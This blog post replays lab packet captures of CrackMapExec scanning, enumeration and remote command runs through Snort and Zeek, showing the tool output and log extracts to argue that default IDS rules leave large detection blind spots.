Thursday, May 2, 2019

Having Fun with CrackMapExec - Snort IDS/IPS Analysis

Now that we have the crackmapexec attack, logs analysis and packet analysis and Zeek analysis done, let's see what we can learn from Snort. I'm using the Snort community ruleset and the default configuration as of April 5, 2019. At the end of this post, hopefully you understand the importance of customizing your security tools to suit your environment.

root@securitynik:~# snort -A full -K ascii -l . -r cme-scan.pcap -c /etc/snort/snort.conf 

Commencing packet processing (pid=5478)
===============================================================================
Run time for packet processing was 1.4221 seconds
Snort processed 1570 packets.
Snort ran for 0 days 0 hours 0 minutes 1 seconds
   Pkts/sec:         1570
===============================================================================
Memory usage summary:
  Total non-mmapped bytes (arena):       45666304
  Bytes in mapped regions (hblkhd):      13574144
  Total allocated space (uordblks):      40400688
  Total free space (fordblks):           5265616
  Topmost releasable block (keepcost):   93600
===============================================================================
Packet I/O Totals:
   Received:         1570
   Analyzed:         1570 (100.000%)
    Dropped:            0 (  0.000%)
   Filtered:            0 (  0.000%)
Outstanding:            0 (  0.000%)
   Injected:            0
===============================================================================
Breakdown by protocol (includes rebuilt packets):
        Eth:         1572 (100.000%)
       VLAN:            0 (  0.000%)
        IP4:           51 (  3.244%)
       Frag:            0 (  0.000%)
       ICMP:            1 (  0.064%)
        UDP:            0 (  0.000%)
        TCP:           50 (  3.181%)
        IP6:            0 (  0.000%)
    IP6 Ext:            0 (  0.000%)
   IP6 Opts:            0 (  0.000%)
      Frag6:            0 (  0.000%)
      ICMP6:            0 (  0.000%)
       UDP6:            0 (  0.000%)
       TCP6:            0 (  0.000%)
     Teredo:            0 (  0.000%)
    ICMP-IP:            0 (  0.000%)
    IP4/IP4:            0 (  0.000%)
    IP4/IP6:            0 (  0.000%)
    IP6/IP4:            0 (  0.000%)
    IP6/IP6:            0 (  0.000%)
        GRE:            0 (  0.000%)
    GRE Eth:            0 (  0.000%)
   GRE VLAN:            0 (  0.000%)
    GRE IP4:            0 (  0.000%)
    GRE IP6:            0 (  0.000%)
GRE IP6 Ext:            0 (  0.000%)
   GRE PPTP:            0 (  0.000%)
    GRE ARP:            0 (  0.000%)
    GRE IPX:            0 (  0.000%)
   GRE Loop:            0 (  0.000%)
       MPLS:            0 (  0.000%)
        ARP:         1521 ( 96.756%)
        IPX:            0 (  0.000%)
   Eth Loop:            0 (  0.000%)
   Eth Disc:            0 (  0.000%)
   IP4 Disc:            0 (  0.000%)
   IP6 Disc:            0 (  0.000%)
   TCP Disc:            0 (  0.000%)
   UDP Disc:            0 (  0.000%)
  ICMP Disc:            0 (  0.000%)
All Discard:            0 (  0.000%)
      Other:            0 (  0.000%)
Bad Chk Sum:            0 (  0.000%)
    Bad TTL:            0 (  0.000%)
     S5 G 1:            0 (  0.000%)
     S5 G 2:            2 (  0.127%)
      Total:         1572
===============================================================================
Action Stats:
     Alerts:            1 (  0.064%)
     Logged:            1 (  0.064%)
     Passed:            0 (  0.000%)
Limits:
      Match:            0
      Queue:            0
        Log:            0
      Event:            0
      Alert:            0
Verdicts:
      Allow:         1570 (100.000%)
      Block:            0 (  0.000%)
    Replace:            0 (  0.000%)
  Whitelist:            0 (  0.000%)
  Blacklist:            0 (  0.000%)
     Ignore:            0 (  0.000%)
      Retry:            0 (  0.000%)
===============================================================================
Frag3 statistics:
        Total Fragments: 0
      Frags Reassembled: 0
               Discards: 0
          Memory Faults: 0
               Timeouts: 0
               Overlaps: 0
              Anomalies: 0
                 Alerts: 0
                  Drops: 0
     FragTrackers Added: 0
    FragTrackers Dumped: 0
FragTrackers Auto Freed: 0
    Frag Nodes Inserted: 0
     Frag Nodes Deleted: 0
===============================================================================
===============================================================================
Stream statistics:
            Total sessions: 4
              TCP sessions: 4
              UDP sessions: 0
             ICMP sessions: 0
               IP sessions: 0
                TCP Prunes: 0
                UDP Prunes: 0
               ICMP Prunes: 0
                 IP Prunes: 0
TCP StreamTrackers Created: 4
TCP StreamTrackers Deleted: 4
              TCP Timeouts: 0
              TCP Overlaps: 0
       TCP Segments Queued: 21
     TCP Segments Released: 21
       TCP Rebuilt Packets: 9
         TCP Segments Used: 16
              TCP Discards: 0
                  TCP Gaps: 1
      UDP Sessions Created: 0
      UDP Sessions Deleted: 0
              UDP Timeouts: 0
              UDP Discards: 0
                    Events: 0
           Internal Events: 0
           TCP Port Filter
                  Filtered: 0
                 Inspected: 0
                   Tracked: 48
           UDP Port Filter
                  Filtered: 0
                 Inspected: 0
                   Tracked: 0
===============================================================================
===============================================================================
SMTP Preprocessor Statistics
  Total sessions                                    : 0
  Max concurrent sessions                           : 0
===============================================================================
dcerpc2 Preprocessor Statistics
  Total sessions: 3
  Total sessions aborted: 3

  Transports
    SMB
      Total sessions: 3
      Packet stats
        Packets: 6
        Maximum outstanding requests: 1
        SMB command requests/responses processed
          Negotiate (0x72) : 3/0
===============================================================================
===============================================================================
SIP Preprocessor Statistics
  Total sessions: 0
===============================================================================
Snort exiting

Let's see if our "alert" file was created.


root@securitynik:~/cme# ls .
10.0.0.2  alert

Now that we know the "alert" file exists, let's see what type of alerts were created.


root@securitynik:~/cme# cat alert 
[**] [1:404:6] ICMP Destination Unreachable Protocol Unreachable [**]
[Classification: Misc activity] [Priority: 3] 
04/07-23:12:37.586514 10.0.0.2 -> 10.0.0.100
ICMP TTL:255 TOS:0x0 ID:24 IpLen:20 DgmLen:56
Type:3  Code:2  DESTINATION UNREACHABLE: PROTOCOL UNREACHABLE
** ORIGINAL DATAGRAM DUMP:
10.0.0.100:50838 -> 10.0.0.2:445
TCP TTL:64 TOS:0x0 ID:17710 IpLen:20 DgmLen:60 DF
Seq: 0x4C552250

From above it seems from Snort's perspective, the only thing it detected was a single ICMP destination unreachable protocol unreachable message.

When the file with the pcap file containing the share enumeration traffic was fed to snort, no alerts were generated.

root@securitynik:~/cme# snort -A console -K none -c /etc/snort/snort.conf -r cme-enum-shares.pcap 
....
===============================================================================
Action Stats:
     Alerts:            0 (  0.000%)
     Logged:            0 (  0.000%)
     Passed:            0 (  0.000%)
Limits:
      Match:            0
      Queue:            0
        Log:            0
      Event:            0
      Alert:            0
Verdicts:
      Allow:          487 (100.000%)
      Block:            0 (  0.000%)
    Replace:            0 (  0.000%)
  Whitelist:            0 (  0.000%)
  Blacklist:            0 (  0.000%)
     Ignore:            0 (  0.000%)
      Retry:            0 (  0.000%)
===============================================================================


As can be seen above, no alerts were created and 487 packets were allowed.


root@securitynik:~/cme# snort -A full -K ascii -l . -r cme-enum-users.pcap -c /etc/snort/snort.conf 

Looking at the user enumeration, we see no alerts were created yet again.


===============================================================================
Packet I/O Totals:
   Received:          438
   Analyzed:          438 (100.000%)
    Dropped:            0 (  0.000%)
   Filtered:            0 (  0.000%)
Outstanding:            0 (  0.000%)
   Injected:            0
===============================================================================
Breakdown by protocol (includes rebuilt packets):
        Eth:          442 (100.000%)
       VLAN:            0 (  0.000%)
        IP4:          437 ( 98.869%)
       Frag:            0 (  0.000%)
       ICMP:            0 (  0.000%)
        UDP:            0 (  0.000%)
        TCP:          437 ( 98.869%)
        IP6:            0 (  0.000%)
    IP6 Ext:            0 (  0.000%)
   IP6 Opts:            0 (  0.000%)
      Frag6:            0 (  0.000%)
      ICMP6:            0 (  0.000%)
       UDP6:            0 (  0.000%)
       TCP6:            0 (  0.000%)
     Teredo:            0 (  0.000%)
    ICMP-IP:            0 (  0.000%)
    IP4/IP4:            0 (  0.000%)
    IP4/IP6:            0 (  0.000%)
    IP6/IP4:            0 (  0.000%)
    IP6/IP6:            0 (  0.000%)
        GRE:            0 (  0.000%)
    GRE Eth:            0 (  0.000%)
   GRE VLAN:            0 (  0.000%)
    GRE IP4:            0 (  0.000%)
    GRE IP6:            0 (  0.000%)
GRE IP6 Ext:            0 (  0.000%)
   GRE PPTP:            0 (  0.000%)
    GRE ARP:            0 (  0.000%)
    GRE IPX:            0 (  0.000%)
   GRE Loop:            0 (  0.000%)
       MPLS:            0 (  0.000%)
        ARP:            5 (  1.131%)
        IPX:            0 (  0.000%)
   Eth Loop:            0 (  0.000%)
   Eth Disc:            0 (  0.000%)
   IP4 Disc:            0 (  0.000%)
   IP6 Disc:            0 (  0.000%)
   TCP Disc:            0 (  0.000%)
   UDP Disc:            0 (  0.000%)
  ICMP Disc:            0 (  0.000%)
All Discard:            0 (  0.000%)
      Other:            0 (  0.000%)
Bad Chk Sum:            0 (  0.000%)
    Bad TTL:            0 (  0.000%)
     S5 G 1:            0 (  0.000%)
     S5 G 2:            4 (  0.905%)
      Total:          442
===============================================================================
Action Stats:
     Alerts:            0 (  0.000%)
     Logged:            0 (  0.000%)
     Passed:            0 (  0.000%)
Limits:
      Match:            0
      Queue:            0
        Log:            0
      Event:            0
      Alert:            0
Verdicts:
      Allow:          438 (100.000%)
      Block:            0 (  0.000%)
    Replace:            0 (  0.000%)
  Whitelist:            0 (  0.000%)
  Blacklist:            0 (  0.000%)
     Ignore:            0 (  0.000%)
      Retry:            0 (  0.000%)
===============================================================================

Let's run Snort against this packet capture containing the packets for the policy and see if anything shows up.


root@securitynik:~/cme# snort -r cme-pass-pol.pcap -A console -K none -c /etc/snort/snort.conf 
.............
===============================================================================
Run time for packet processing was 0.3095 seconds
Snort processed 113 packets.
Snort ran for 0 days 0 hours 0 minutes 0 seconds
   Pkts/sec:          113
===============================================================================
....
===============================================================================
Packet I/O Totals:
   Received:          113
   Analyzed:          113 (100.000%)
    Dropped:            0 (  0.000%)
   Filtered:            0 (  0.000%)
Outstanding:            0 (  0.000%)
   Injected:            0
===============================================================================
....

===============================================================================
Action Stats:
     Alerts:            0 (  0.000%)
     Logged:            0 (  0.000%)
     Passed:            0 (  0.000%)
Limits:
      Match:            0
      Queue:            0
        Log:            0
      Event:            0
      Alert:            0
Verdicts:
      Allow:          113 (100.000%)
      Block:            0 (  0.000%)
    Replace:            0 (  0.000%)
  Whitelist:            0 (  0.000%)
  Blacklist:            0 (  0.000%)
     Ignore:            0 (  0.000%)
      Retry:            0 (  0.000%)
===============================================================================

Uh Oh! Once again, we have no visibility into the packets and thus snort produced no results.

Let's now see what the communication looks like when crackmapexec runs a powershell command.`


root@securitynik:~/cme# snort -A console -K none -c /etc/snort/snort.conf -r cme-powershell.pcap 

Commencing packet processing (pid=7651)
04/18-04:32:12.474140  [**] [1:1917:6] SCAN UPnP service discover attempt [**] [Classification: Detection of a Network Scan] [Priority: 3] {UDP} 10.0.0.3:56736 -> 239.255.255.250:1900
04/18-04:32:13.474803  [**] [1:1917:6] SCAN UPnP service discover attempt [**] [Classification: Detection of a Network Scan] [Priority: 3] {UDP} 10.0.0.3:56736 -> 239.255.255.250:1900
04/18-04:32:14.475259  [**] [1:1917:6] SCAN UPnP service discover attempt [**] [Classification: Detection of a Network Scan] [Priority: 3] {UDP} 10.0.0.3:56736 -> 239.255.255.250:1900
04/18-04:32:15.476480  [**] [1:1917:6] SCAN UPnP service discover attempt [**] [Classification: Detection of a Network Scan] [Priority: 3] {UDP} 10.0.0.3:56736 -> 239.255.255.250:1900
===============================================================================
Run time for packet processing was 1.751 seconds
Snort processed 247 packets.
Snort ran for 0 days 0 hours 0 minutes 1 seconds
   Pkts/sec:          247
===============================================================================
Packet I/O Totals:
   Received:          247
   Analyzed:          247 (100.000%)
    Dropped:            0 (  0.000%)
   Filtered:            0 (  0.000%)
Outstanding:            0 (  0.000%)
   Injected:            0
===============================================================================
Breakdown by protocol (includes rebuilt packets):
        Eth:          250 (100.000%)
       VLAN:            0 (  0.000%)
        IP4:          242 ( 96.800%)
....
        UDP:            4 (  1.600%)
        TCP:          238 ( 95.200%)
....
Bad Chk Sum:          127 ( 50.800%)
    Bad TTL:            0 (  0.000%)
     S5 G 1:            3 (  1.200%)
     S5 G 2:            0 (  0.000%)
      Total:          250
===============================================================================
Action Stats:
     Alerts:            4 (  1.600%)
     Logged:            4 (  1.600%)
     Passed:            0 (  0.000%)
Limits:
      Match:            0
      Queue:            0
        Log:            0
      Event:            0
      Alert:            0
Verdicts:
      Allow:          247 (100.000%)
      Block:            0 (  0.000%)
    Replace:            0 (  0.000%)
  Whitelist:            0 (  0.000%)
  Blacklist:            0 (  0.000%)
     Ignore:            0 (  0.000%)
      Retry:            0 (  0.000%)
===============================================================================

So it looks like above we got four alerts. However, these in no way reflect what our concerns are.

Let's move on now to running Snort against the final command. In this case, we will be running Snort against the pcap which contains our "ncat.exe" execution.


root@securitynik:~/cme# snort -A console -K none -r cme-ncat.pcap -c /etc/snort/snort.conf 
......
===============================================================================
Run time for packet processing was 1.2717 seconds
Snort processed 356 packets.
Snort ran for 0 days 0 hours 0 minutes 1 seconds
   Pkts/sec:          356
===============================================================================
Memory usage summary:
  Total non-mmapped bytes (arena):       44724224
  Bytes in mapped regions (hblkhd):      13574144
  Total allocated space (uordblks):      40400432
  Total free space (fordblks):           4323792
  Topmost releasable block (keepcost):   3680
===============================================================================
Packet I/O Totals:
   Received:          356
   Analyzed:          356 (100.000%)
    Dropped:            0 (  0.000%)
   Filtered:            0 (  0.000%)
Outstanding:            0 (  0.000%)
   Injected:            0
===============================================================================
Breakdown by protocol (includes rebuilt packets):
        Eth:          360 (100.000%)
       VLAN:            0 (  0.000%)
        IP4:          360 (100.000%)
       Frag:            0 (  0.000%)
       ICMP:            0 (  0.000%)
        UDP:            0 (  0.000%)
        TCP:          360 (100.000%)
        IP6:            0 (  0.000%)
    IP6 Ext:            0 (  0.000%)
   IP6 Opts:            0 (  0.000%)
      Frag6:            0 (  0.000%)
      ICMP6:            0 (  0.000%)
       UDP6:            0 (  0.000%)
       TCP6:            0 (  0.000%)
     Teredo:            0 (  0.000%)
    ICMP-IP:            0 (  0.000%)
    IP4/IP4:            0 (  0.000%)
    IP4/IP6:            0 (  0.000%)
    IP6/IP4:            0 (  0.000%)
    IP6/IP6:            0 (  0.000%)
        GRE:            0 (  0.000%)
    GRE Eth:            0 (  0.000%)
   GRE VLAN:            0 (  0.000%)
    GRE IP4:            0 (  0.000%)
    GRE IP6:            0 (  0.000%)
GRE IP6 Ext:            0 (  0.000%)
   GRE PPTP:            0 (  0.000%)
    GRE ARP:            0 (  0.000%)
    GRE IPX:            0 (  0.000%)
   GRE Loop:            0 (  0.000%)
       MPLS:            0 (  0.000%)
        ARP:            0 (  0.000%)
        IPX:            0 (  0.000%)
   Eth Loop:            0 (  0.000%)
   Eth Disc:            0 (  0.000%)
   IP4 Disc:            0 (  0.000%)
   IP6 Disc:            0 (  0.000%)
   TCP Disc:            0 (  0.000%)
   UDP Disc:            0 (  0.000%)
  ICMP Disc:            0 (  0.000%)
All Discard:            0 (  0.000%)
      Other:            0 (  0.000%)
Bad Chk Sum:          192 ( 53.333%)
    Bad TTL:            0 (  0.000%)
     S5 G 1:            3 (  0.833%)
     S5 G 2:            1 (  0.278%)
      Total:          360
===============================================================================
Action Stats:
     Alerts:            0 (  0.000%)
     Logged:            0 (  0.000%)
     Passed:            0 (  0.000%)
Limits:
      Match:            0
      Queue:            0
        Log:            0
      Event:            0
      Alert:            0
Verdicts:
      Allow:          356 (100.000%)
      Block:            0 (  0.000%)
    Replace:            0 (  0.000%)
  Whitelist:            0 (  0.000%)
  Blacklist:            0 (  0.000%)
     Ignore:            0 (  0.000%)
      Retry:            0 (  0.000%)
===============================================================================


Bummer!! Once again, we see there is no alerts.  Guess by default, we may have lots of blindspots.

Well let's wrap up this post here.

Important Note: One of the reasons why I used the default ruleset without any modification, as in enabling disabling any rule, is because I wanted to emphasize the importance of ensuring you configure and customize your security tools to your specific environment.This is true for all of your security tools which allow you the ability to customize for your unique environment.

References:
Snort

Posts in this series:
Having Fun with CrackMapExec
Having Fun with CrackMapExec - Log Analysis
Having Fun with CrackMapExec - Packet Analysis - CrackMapExec
Having Fun with CrackMapExec - Zeek (Bro) Analysis
Having Fun with CrackMapExec - Snort IDS/IPS Analysis

Having Fun with CrackMapExec - Zeek (Bro) Analysis

Now that we have the crackmapexec attack, logs analysis and packet analysis done, let's see what we can learn via Zeek. I'm using Zeek 2.6.1 with its default configuration.

root@securitynik:~/cme# bro -v
bro version 2.6.1

First up, let's feed the packet capture file to Zeek

root@securitynik:~/cme# bro --readfile ../cme-scan.pcap 
root@securitynik:~/cme# ls *.log
conn.log  ntlm.log  packet_filter.log

Above, we see Zeek created 3 files. Let's look at the "conn.log" first. Specifically let's look at the timestamp (ts), UID, initator of the traffic (id.orig_h), initiator port (id.orig_p), responder IP (id.resp_h), the responder port (id.resp_p) and the duration fields

root@securitynik:~/cme# bro-cut -c -d ts uid id.orig_h id.orig_p id.resp_h id.resp_p duration < conn.log
ts     uid  id.orig_h id.orig_p id.resp_h id.resp_p duration
2019-04-07T23:12:37-0400 CjNvrv4gbVjWpr8wW7 10.0.0.100 50838  10.0.0.2  445  -
2019-04-07T23:12:37-0400 CcQqvc2R7wksUnwk67 10.0.0.100 39670  10.0.0.3  445  0.036872
2019-04-07T23:12:37-0400 CBhSgW3yY3pOSGPzIj 10.0.0.100 50874  10.0.0.103  445  0.021902
2019-04-07T23:12:40-0400 CwnIaTt7Cf7ETVqd1 10.0.0.100 34564  10.0.0.105  445  10.514551
2019-04-07T23:12:37-0400 CfVMe42XyttIu2aENc 10.0.0.2 3   10.0.0.100  2  -

From above, the immediate conclusion is that the host at 10.0.0.100 is communicating with these destination hosts all virtually at the same time around 23:08 on May 7, 2019. Additionally, we see the 4th record stands out to me because it is marked as having a duration of 10.5 seconds. This when compared to the others is significant. Let's see where else the UID "CwnIaTt7Cf7ETVqd1", which is associated with the 4th record may be found.


root@securitynik:~/cme# grep "CwnIaTt7Cf7ETVqd1" *.log
conn.log:1554693160.674207 CwnIaTt7Cf7ETVqd1 10.0.0.100 34564 10.0.0.105 445 tcp gssapi,smb,ntlm 10.514551 594 1016 RSTR - - 0 ShADdFar 10 1026 9 1460 -
ntlm.log:1554693160.689358 CwnIaTt7Cf7ETVqd1 10.0.0.100 34564 10.0.0.105 445 - - - SECNIK-2K19 SECNIK-2K19.securitynik.local - T

Looks like there is related activity in the "ntlm.log". As I know there is not much activity in this "ntlm.log" file, let's just poke directly into that log to see what we get.


root@securitynik:~/cme# bro-cut -c -d ts uid id.orig_h id.orig_p id.resp_h id.resp_p domainname server_nb_computer_name server_dns_computer_name < ntlm.log 
#fields ts uid id.orig_h id.orig_p id.resp_h id.resp_p domainname server_nb_computer_name server_dns_computer_name
2019-04-07T23:12:40-0400 CwnIaTt7Cf7ETVqd1 10.0.0.100 34564 10.0.0.105 445 - SECNIK-2K19 SECNIK-2K19.securitynik.local
2019-04-07T23:12:37-0400 CcQqvc2R7wksUnwk67 10.0.0.100 39670 10.0.0.3 445 - SECURITYNIK-SYS SECURITYNIK-SYS
2019-04-07T23:12:37-0400 CBhSgW3yY3pOSGPzIj 10.0.0.100 50874 10.0.0.103 445 - SECURITYNIK-WIN SECURITYNIK-WIN10

Let's move on to see what we get from Zeek as it relates to detecting the shares enumeration.


root@securitynik:~/cme# bro --readfile cme-enum-shares.pcap 
root@securitynik:~/cme# ls *.log
conn.log  ntlm.log  packet_filter.log  weird.log

root@securitynik:~/cme# bro-cut -c -d ts uid id.orig_h id.orig_p id.resp_h id.resp_p duration < conn.log
#fields ts uid id.orig_h id.orig_p id.resp_h id.resp_p duration
2019-04-08T21:19:49-0400 CLsD7H3kX4egNGDela 10.0.0.100 52018 10.0.0.103 445 0.043698
2019-04-08T21:19:49-0400 CvsqTnSwr26xyKtb 10.0.0.100 35708 10.0.0.105 445 1.365110
2019-04-08T21:19:49-0400 CDSASQ2JrYCv1jsVEk 10.0.0.100 35716 10.0.0.105 445 1.225863
2019-04-08T21:19:49-0400 CQUAMD4duBkS7wmHSc 10.0.0.100 35710 10.0.0.105 445 1.340920
2019-04-08T21:19:49-0400 CxoLsk1HnbryEf2G8e 10.0.0.100 41024 10.0.0.3 445 1.245527
2019-04-08T21:19:50-0400 Cs28ja4K4xmf5DA4A7 10.0.0.100 52032 10.0.0.103 445 0.861895
2019-04-08T21:19:49-0400 C5Gqyk16xqfRTSO8U 10.0.0.100 52026 10.0.0.103 445 1.324494
2019-04-08T21:19:49-0400 CQCNqc3C2LGUQL6oUd 10.0.0.100 41016 10.0.0.3 445 0.118876

From above, to me nothing stands out immediately. Let's once again peek into the "ntlm.log" file.


root@securitynik:~/cme# bro-cut -c -d ts uid id.orig_h id.orig_p id.resp_h id.resp_p username domainname server_nb_computer_name server_dns_computer_name < ntlm.log 
#fields ts uid id.orig_h id.orig_p id.resp_h id.resp_p username domainname server_nb_computer_name server_dns_computer_name
2019-04-08T21:19:49-0400 CvsqTnSwr26xyKtb 10.0.0.100 35708 10.0.0.105 445 - - SECNIK-2K19 SECNIK-2K19.securitynik.local
2019-04-08T21:19:49-0400 CQUAMD4duBkS7wmHSc 10.0.0.100 35710 10.0.0.105 445 administrator SECURITYNIK SECNIK-2K19 SECNIK-2K19.securitynik.local
2019-04-08T21:19:49-0400 CDSASQ2JrYCv1jsVEk 10.0.0.100 35716 10.0.0.105 445 administrator SECURITYNIK SECNIK-2K19 SECNIK-2K19.securitynik.local
2019-04-08T21:19:49-0400 C5Gqyk16xqfRTSO8U 10.0.0.100 52026 10.0.0.103 445 securitynik SECURITYNIK-WIN SECURITYNIK-WIN SECURITYNIK-WIN10
2019-04-08T21:19:50-0400 Cs28ja4K4xmf5DA4A7 10.0.0.100 52032 10.0.0.103 445 securitynik SECURITYNIK-WIN SECURITYNIK-WIN SECURITYNIK-WIN10
2019-04-08T21:19:49-0400 CLsD7H3kX4egNGDela 10.0.0.100 52018 10.0.0.103 445 - - SECURITYNIK-WIN SECURITYNIK-WIN10
2019-04-08T21:19:50-0400 CxoLsk1HnbryEf2G8e 10.0.0.100 41024 10.0.0.3 445 saadia SECURITYNIK-SYS SECURITYNIK-SYS SECURITYNIK-SYS
2019-04-08T21:19:49-0400 CQCNqc3C2LGUQL6oUd 10.0.0.100 41016 10.0.0.3 445 - - SECURITYNIK-SYS SECURITYNIK-SYS


From above, what immediately stands out to me is the username "administrator". Anyhow, there is not another log for us to look at, we would only be able to correlate between the "conn.log" and "ntlm.log".

Moving on to the enumeration of the users:


root@securitynik:~/cme# bro --readfile cme-enum-users.pcap 
root@securitynik:~/cme# ls *.log
conn.log  ntlm.log  packet_filter.log

As before, let's take a look at the "conn.log" and then we will analyze the "ntlm.log".


root@securitynik:~/cme# bro-cut -d ts uid id.orig_h id.orig_p id.resp_h id.resp_p < conn.log 
2019-04-09T21:08:41-0400 CE9bTu12QILo9my5df 10.0.0.100 36656 10.0.0.105 445
2019-04-09T21:08:41-0400 C9UAC8ZQwUK5MwhJc 10.0.0.100 52972 10.0.0.103 445
2019-04-09T21:08:41-0400 CTrbie3OsppyPktT47 10.0.0.100 36662 10.0.0.105 445
2019-04-09T21:08:41-0400 CvR5xHfpQ1NQdYI57 10.0.0.100 41964 10.0.0.3 445
2019-04-09T21:08:41-0400 CgCTMu3kPdQD1Irzcd 10.0.0.100 52962 10.0.0.103 445
2019-04-09T21:08:41-0400 C7SzpR2UMcJY3gFgu4 10.0.0.100 52980 10.0.0.103 445
2019-04-09T21:08:41-0400 CAQyS13AgNypXSffs7 10.0.0.100 36660 10.0.0.105 445
2019-04-09T21:08:41-0400 CfuNcC34YIeYHlaiLk 10.0.0.100 52978 10.0.0.103 445
2019-04-09T21:08:41-0400 Cbwwz61zxTVZAytGHe 10.0.0.100 36652 10.0.0.105 445
2019-04-09T21:08:41-0400 CyJGuxj0AILgAELsd 10.0.0.100 41960 10.0.0.3 445

From above there is not much conclusions for us to draw once again, other than the fact that this communication are all happening around the same time.


root@securitynik:~/cme# bro-cut -c -d ts uid id.orig_h id.orig_p id.resp_h id.resp_p duration < conn.log
ts uid id.orig_h id.orig_p id.resp_h id.resp_p duration
2019-04-09T21:08:41-0400 CDHlVp2TZn98Xqjt7g 10.0.0.100 36656 10.0.0.105 445 1.522323
2019-04-09T21:08:41-0400 C8FXLa3K9LLkRLzZva 10.0.0.100 36662 10.0.0.105 445 1.280663
2019-04-09T21:08:41-0400 C65WCnrH8cvDtgb93 10.0.0.100 52972 10.0.0.103 445 1.491506
2019-04-09T21:08:41-0400 CDGfFq4OSyP93Yxmlc 10.0.0.100 52962 10.0.0.103 445 0.053613
2019-04-09T21:08:41-0400 CPseIk1gv1hDfBkUNa 10.0.0.100 36660 10.0.0.105 445 1.325062
2019-04-09T21:08:41-0400 CY43UY3p9ETx00EaLc 10.0.0.100 52980 10.0.0.103 445 0.618712
2019-04-09T21:08:41-0400 CDTWQD1PTtpNjBPs33 10.0.0.100 36652 10.0.0.105 445 1.541821
2019-04-09T21:08:41-0400 Cx2ckqUMuchuVZBn5 10.0.0.100 41964 10.0.0.3 445 1.491122
2019-04-09T21:08:41-0400 Cuf18x1OI85olS2il8 10.0.0.100 41960 10.0.0.3 445 0.042531
2019-04-09T21:08:41-0400 Casvg779QdFvZycg 10.0.0.100 52978 10.0.0.103 445 1.178591

Similar to the previous analysis, nothing really stands out here to me that causes me to worry. Let's move on the "ntlm.log"


root@securitynik:~/cme# bro-cut -c -d ts uid id.orig_h id.orig_p id.resp_h id.resp_p username domainname server_nb_computer_name server_dns_computer_name < ntlm.log 
#fields ts uid id.orig_h id.orig_p id.resp_h id.resp_p username domainname server_nb_computer_name server_dns_computer_name
2019-04-09T21:08:41-0400 CDTWQD1PTtpNjBPs33 10.0.0.100 36652 10.0.0.105 445 - - SECNIK-2K19 SECNIK-2K19.securitynik.local
2019-04-09T21:08:41-0400 CDHlVp2TZn98Xqjt7g 10.0.0.100 36656 10.0.0.105 445 administrator SECURITYNIK SECNIK-2K19 SECNIK-2K19.securitynik.local
2019-04-09T21:08:41-0400 CPseIk1gv1hDfBkUNa 10.0.0.100 36660 10.0.0.105 445 administrator SECURITYNIK SECNIK-2K19 SECNIK-2K19.securitynik.local
2019-04-09T21:08:41-0400 C65WCnrH8cvDtgb93 10.0.0.100 52972 10.0.0.103 445 administrator SECURITYNIK-WIN SECURITYNIK-WIN SECURITYNIK-WIN10
2019-04-09T21:08:41-0400 Casvg779QdFvZycg 10.0.0.100 52978 10.0.0.103 445 administrator SECURITYNIK-WIN SECURITYNIK-WIN SECURITYNIK-WIN10
2019-04-09T21:08:41-0400 CY43UY3p9ETx00EaLc 10.0.0.100 52980 10.0.0.103 445 administrator SECURITYNIK-WIN SECURITYNIK-WIN SECURITYNIK-WIN10
2019-04-09T21:08:42-0400 C8FXLa3K9LLkRLzZva 10.0.0.100 36662 10.0.0.105 445 administrator SECURITYNIK SECNIK-2K19 SECNIK-2K19.securitynik.local
2019-04-09T21:08:41-0400 CDGfFq4OSyP93Yxmlc 10.0.0.100 52962 10.0.0.103 445 - - SECURITYNIK-WIN SECURITYNIK-WIN10
2019-04-09T21:08:41-0400 Cx2ckqUMuchuVZBn5 10.0.0.100 41964 10.0.0.3 445 administrator SECURITYNIK-SYS SECURITYNIK-SYS SECURITYNIK-SYS
2019-04-09T21:08:41-0400 Cuf18x1OI85olS2il8 10.0.0.100 41960 10.0.0.3 445 - - SECURITYNIK-SYS SECURITYNIK-SYS

Whereas previously we saw 3 different usernames, in this log we see all the activity is using the username "administrator". With more data, this maybe something we can dig into more. However, with no additional Zeek logs, there is only so much to analyze.

Let's now see what bro will find about the password policy enumeration


root@securitynik:~/cme# bro --readfile cme-pass-pol.pcap 
root@securitynik:~/cme# ls *.log
conn.log  ntlm.log  packet_filter.log  reporter.log  weird.log

As can be seeen above, the only log of importance which was created is the "conn.log". Let's peak into it to see what we got.


root@securitynik:~/cme# bro-cut -d ts uid id.orig_h id.orig_p id.resp_h id.resp_p service < conn.log
2019-04-17T11:10:20-0400 CT0fARjKtm01wxvxf 10.0.0.100 52488 10.0.0.105 445 -
2019-04-17T11:10:20-0400 CIN1L14hrIc7chcTL4 10.0.0.100 52490 10.0.0.105 445 -
2019-04-17T11:10:21-0400 Co4bTt4p30bUxmSODh 10.0.0.100 52492 10.0.0.105 445 -
2019-04-17T11:10:21-0400 CLkUtG4EcfqBVcZwd9 10.0.0.100 52494 10.0.0.105 445 -
2019-04-17T11:10:21-0400 CgjL5S2dyVXChVJz02 10.0.0.100 52494 10.0.0.105 445 smb,gssapi,ntlm
2019-04-17T11:10:21-0400 CfFHtB1GOafL7T2D 10.0.0.100 52492 10.0.0.105 445 smb,gssapi,ntlm
2019-04-17T11:10:20-0400 Chtw4S3EyTA0qD0Lo4 10.0.0.100 52490 10.0.0.105 445 smb,gssapi,ntlm
2019-04-17T11:10:20-0400 CJqxjr44ziVWhXniXd 10.0.0.100 52488 10.0.0.105 445 smb,gssapi,ntlm

Apparently the above is not much for us to celebrate or have a party for. Let's see what the "ntlm.log" file has to offer


root@securitynik:~/cme# bro-cut -c -d ts uid id.orig_h id.orig_p id.resp_h id.resp_p username domainname server_nb_computer_name server_dns_computer_name < ntlm.log 
#fields ts uid id.orig_h id.orig_p id.resp_h id.resp_p username domainname server_nb_computer_name server_dns_computer_name
2019-04-17T11:10:20-0400 CJqxjr44ziVWhXniXd 10.0.0.100 52488 10.0.0.105 445 - - SECNIK-2K19 SECNIK-2K19.securitynik.local
2019-04-17T11:10:20-0400 Chtw4S3EyTA0qD0Lo4 10.0.0.100 52490 10.0.0.105 445 - - SECNIK-2K19 SECNIK-2K19.securitynik.local
2019-04-17T11:10:21-0400 CfFHtB1GOafL7T2D 10.0.0.100 52492 10.0.0.105 445 - - SECNIK-2K19 SECNIK-2K19.securitynik.local
2019-04-17T11:10:21-0400 CgjL5S2dyVXChVJz02 10.0.0.100 52494 10.0.0.105 445 - - SECNIK-2K19 SECNIK-2K19.securitynik.local


Well similarly to the previous entries above, there is not much more for us to correlate with.

Let's now see what the communication looks like when crackmapexec runs a powershell command.


root@securitynik:~/cme# bro --readfile cme-powershell.pcap 
root@securitynik:~/cme# ls *.log
